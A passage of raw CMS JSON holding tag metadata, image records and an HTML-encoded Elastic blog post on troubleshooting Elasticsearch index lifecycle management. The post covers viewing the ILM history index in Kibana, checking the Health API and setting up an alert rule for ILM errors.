:"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt49d4b623ebdfdd90","ACL":{},"created_at":"2022-09-13T16:43:19.010Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2022-09-13T16:43:19.010Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.239Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt2e5ece40473e6b0a","ACL":{},"created_at":"2020-06-17T03:32:06.756Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"log-analytics","label_l10n":"Log analytics","tags":[],"title":"Log analytics","updated_at":"2020-07-06T22:20:10.220Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.397Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt60e4f8c6c19cebb7","ACL":{},"created_at":"2020-06-17T03:32:19.868Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"metrics","label_l10n":"Metrics","tags":[],"title":"Metrics","updated_at":"2020-07-06T22:20:08.577Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.406Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltcb82f8bd7960ed62","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-26T16:28:55.149Z","created_by":"bltb6c155cd84fc0c1a","file_size":"72330","filename":"09-road_(1).jpeg","parent_uid":null,"tags":[],"title":"09-road (1).jpeg","updated_at":"2024-11-26T16:28:55.149Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-26T16:59:00.942Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcb82f8bd7960ed62/6745f7470da03c76e5b53649/09-road_(1).jpeg"},"title":"Stream AWS metrics to Elastic using Amazon CloudWatch Metric Streams","title_l10n":"Stream AWS metrics to Elastic using Amazon CloudWatch Metric Streams","updated_at":"2024-11-30T01:23:01.712Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-aws-amazon-cloudwatch-metric-streams","publish_details":{"time":"2024-11-30T01:23:07.828Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt952b043faa8adcc2","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Learn how to view the ILM history index, filter to issues, and set up monitoring to alert when intervention is required. ","author":["bltddff0459e563bc78"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-11-26T19:53:33.071Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs07ba416a7f8935f9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHowdy, all! In a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/troubleshooting-elasticsearch-ilm-common-issues-and-fixes\"\u003e\u003cspan style='font-size: 12pt;'\u003eprevious blog\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, we outlined common \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index-lifecycle-management.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eindex lifecycle management (ILM)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e issues and their resolutions. We’ve since added these common scenarios into our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/master/index-lifecycle-error-handling.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch documentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e with example walkthrough videos. Here, we’ll expand on the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-settings.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eILM history index\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to demonstrate how to use it during troubleshooting and to set up proactive alerting when intervention is needed.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"ILM theory","_metadata":{"uid":"cs073c58892cd6926f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eILM automates \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/overview-index-lifecycle-management.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ecommon administrative tasks\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e through logic and time delays, like rotating ingest to a new index, aging indices through hardware temperatures, and removing data after its retention period.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo protect data integrity, ILM \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-index-lifecycle.html\"\u003e\u003cspan style='font-size: 12pt;'\u003esequentially performs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e these requested phases and their actions. Unlike some other industry tools, this means that if an index catches on a step, ILM will not proceed the index to a sequential step until the current issue has been resolved. This avoids midstates for advanced actions and is protective, for example, when an index’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/set-up-lifecycle-policy.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eILM policy\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is marked to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-wait-for-snapshot.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ewait for snapshot\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e before \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-delete.html\"\u003e\u003cspan style='font-size: 12pt;'\u003edeletion\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in order to guarantee data is captured in a backup for compliance.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"History index","_metadata":{"uid":"cs6651235436b98a3e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe ILM history index \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eilm-history-*\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e stores the historical summary of indices’ \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-explain-lifecycle.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eILM explain\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e data. It is enabled by default under the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-settings.html\"\u003e\u003cspan style='font-size: 12pt;'\u003esetting\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eindices.lifecycle.history_index_enabled\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. You can view this data in Kibana by creating a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/data-views.html\"\u003e\u003cspan style='font-size: 12pt;'\u003edata view\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e against this index pattern. For example, under \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate data view\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, we will target the index pattern \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eilm-history-7\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5f62687cf19c4c9d"}}},{"image":{"image":{"uid":"bltcece50de2863f168","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:34:59.462Z","created_by":"bltb6c155cd84fc0c1a","file_size":"231706","filename":"1.png","parent_uid":null,"tags":[],"title":"1.png","updated_at":"2024-11-26T19:34:59.462Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:00.934Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcece50de2863f168/674622e335ea3e25251bdcee/1.png"},"_metadata":{"uid":"cs71e01e5180ea1acf"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csb04f67606c4bf724"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOnce created, we can review data under \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/discover.html\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDiscover\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. I prefer to browse the created index pattern by\u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/discover.html#explore-fields-in-your-data\"\u003e\u003cspan style='font-size: 12pt;'\u003e toggling the table columns\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e: [\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eindex\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003epolicy\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003estate.phase\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003estate.action\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003estate.step\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esuccess,error_details\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e].\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse18673031e2a3605"}}},{"image":{"image":{"uid":"blt05c06577f19c0626","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:35:13.493Z","created_by":"bltb6c155cd84fc0c1a","file_size":"306372","filename":"2.png","parent_uid":null,"tags":[],"title":"2.png","updated_at":"2024-11-26T19:35:13.493Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:00.914Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt05c06577f19c0626/674622f183dc3e3004b778a4/2.png"},"_metadata":{"uid":"cs044966b653c5ab46"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs77dddf5cc9f4f510"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis log is helpful when troubleshooting why indices historically were experiencing issues performing their step, such as a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-rollover.html\"\u003e\u003cspan style='font-size: 12pt;'\u003erollover\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e encountering \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/master/index-lifecycle-error-handling.html#_setting_index_lifecycle_rollover_alias_for_index_y_is_empty_or_not_defined\"\u003e\u003cspan style='font-size: 12pt;'\u003eerror\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003esetting [index.lifecycle.rollover_alias] for index [x] is empty or not defined\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis can also be helpful to review if indices stayed on particular subactions longer than expected. For example, extended duration on \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-migrate.html\"\u003e\u003cspan style='font-size: 12pt;'\u003emigrate\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e may indicate cluster or network strain. Alternatively, extended time in \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-wait-for-snapshot.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ewait for snapshot\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e may indicate \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots-register-repository.html\"\u003e\u003cspan style='font-size: 12pt;'\u003erepository\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e health issues.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSimilar ILM information is logged into \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/logging.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch cluster logs\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e but in a different format. Both are equally valid for troubleshooting. I find users prefer to retain ILM history longer than cluster logs for compliance reasons. Let’s show the similarities! Under \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, I enabled \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-monitoring-setup.html\"\u003e\u003cspan style='font-size: 12pt;'\u003elogs and metrics\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e so that I can create a data view against \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eelastic-cloud-logs-8\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs44890314cad16ddf"}}},{"image":{"image":{"uid":"blt17301e287ec6b72d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:35:22.307Z","created_by":"bltb6c155cd84fc0c1a","file_size":"262565","filename":"3.png","parent_uid":null,"tags":[],"title":"3.png","updated_at":"2024-11-26T19:35:22.307Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:01.014Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt17301e287ec6b72d/674622fab09fe947fac05aed/3.png"},"_metadata":{"uid":"csf3b24b6e0f89ea18"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs50c7783f82f5be5f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThen, in \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDiscover\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, I can filter to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003elog.logger: \"org.elasticsearch.xpack.ilm.IndexLifecycleRunner\"\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8405ed15652fb99b"}}},{"image":{"image":{"uid":"blte3850799426ba75c","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:38:31.297Z","created_by":"bltb6c155cd84fc0c1a","file_size":"327457","filename":"4.png","parent_uid":null,"tags":[],"title":"4.png","updated_at":"2024-11-26T19:38:31.297Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:00.966Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte3850799426ba75c/674623b7799856c57be22278/4.png"},"_metadata":{"uid":"cs58cb0d358ce8d24c"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs4285396047c9411d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou’ll notice the 10-minute periodicity, which is answered by ILM’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-settings.html\"\u003e\u003cspan style='font-size: 12pt;'\u003esetting\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eindices.lifecycle.poll_interval\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e value.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Check for issues","_metadata":{"uid":"cs99459fe99397d147"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe recommend using the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/health-api.html#health-api-response-details-ilm\"\u003e\u003cspan style='font-size: 12pt;'\u003eHealth API\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e introduced in v8.7 to check for active ILM issues. This reports against both errors and stagnated steps, so it is more thorough than scrolling through \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/ilm-explain-lifecycle.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eILM explain\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. A healthy result from \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/master/console-kibana.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eDev Tools\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e appears:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse778db3e6ca10edb"}}},{"image":{"image":{"uid":"blt9d6f7e93633c0c9d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:39:35.745Z","created_by":"bltb6c155cd84fc0c1a","file_size":"193984","filename":"5.png","parent_uid":null,"tags":[],"title":"5.png","updated_at":"2024-11-26T19:39:35.745Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:00.995Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9d6f7e93633c0c9d/674623f75a3b43846435c3ad/5.png"},"_metadata":{"uid":"cs56bf0469bc75d18b"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csdaa8266679fd8ad0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud loads this information into its deployment health, which reports:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs14ba141b5f26e249"}}},{"image":{"image":{"uid":"blt132d97720548b1f8","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:39:55.890Z","created_by":"bltb6c155cd84fc0c1a","file_size":"238394","filename":"6.png","parent_uid":null,"tags":[],"title":"6.png","updated_at":"2024-11-26T19:39:55.890Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:00.945Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt132d97720548b1f8/6746240b64eb63930ed724f8/6.png"},"_metadata":{"uid":"cseb6f16e9ccf34956"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbb75e70555b90749"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAn example of an unhealthy report from Dev Tools appears:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0e33b995fe424c2e"}}},{"image":{"image":{"uid":"bltfb8649280fa92a4e","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:40:02.889Z","created_by":"bltb6c155cd84fc0c1a","file_size":"324373","filename":"7.png","parent_uid":null,"tags":[],"title":"7.png","updated_at":"2024-11-26T19:40:02.889Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:00.924Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfb8649280fa92a4e/67462412ef6d5a834422773b/7.png"},"_metadata":{"uid":"csc0b7d80c39817348"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs11f214b7aa58779d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud correspondingly reports:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8fb9e9d1bea80299"}}},{"image":{"image":{"uid":"blt7be07b2dc5317cd0","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:40:11.039Z","created_by":"bltb6c155cd84fc0c1a","file_size":"261231","filename":"8.png","parent_uid":null,"tags":[],"title":"8.png","updated_at":"2024-11-26T19:40:11.039Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:01.024Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7be07b2dc5317cd0/6746241b55b7a3592f80deff/8.png"},"_metadata":{"uid":"cs6da8c3452ef02e2a"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Monitor errors","_metadata":{"uid":"cs4a5f7ceb5bda5eab"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe recommend setting up monitoring \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/create-and-manage-rules.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eKibana rules\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to be notified when intervention is needed to rectify an index’s ILM error, so it can then proceed through its lifecycle. This setup is on top of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/xpack-monitoring.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eStack Monitoring\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and its \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/kibana-alerts.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eother performance alerts\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs an example, under \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate Rule\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, we’ll select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStack Alerts\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, then choose type \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/kibana/current/rule-type-es-query.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch query\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8c79d43135bdebc3"}}},{"image":{"image":{"uid":"blta756feb57bf1b358","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:40:19.373Z","created_by":"bltb6c155cd84fc0c1a","file_size":"275330","filename":"9.png","parent_uid":null,"tags":[],"title":"9.png","updated_at":"2024-11-26T19:40:19.373Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:00.975Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta756feb57bf1b358/6746242331c3825b5e8d1b1a/9.png"},"_metadata":{"uid":"cs89692614e474d06a"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs572005ca0b4e98f6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’ll give our rule a name “ILM erring.” Scrolling down, we’ll target data view \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eilm-history-7\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e with Lucene query \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eerror AND log.logger:\"org.elasticsearch.xpack.ilm.IndexLifecycleRunner\"\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. For our example, we want to be notified for any matches, so we will set the threshold to “is above 1.”\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs02b89411d5712ab3"}}},{"image":{"image":{"uid":"blt910180ea9b66d434","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-26T19:40:27.263Z","created_by":"bltb6c155cd84fc0c1a","file_size":"274422","filename":"10.png","parent_uid":null,"tags":[],"title":"10.png","updated_at":"2024-11-26T19:40:27.263Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-29T14:00:01.004Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt910180ea9b66d434/6746242bc63c389f4a2ee25c/10.png"},"_metadata":{"uid":"csb028121bf8a5b651"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3017e9ab1f6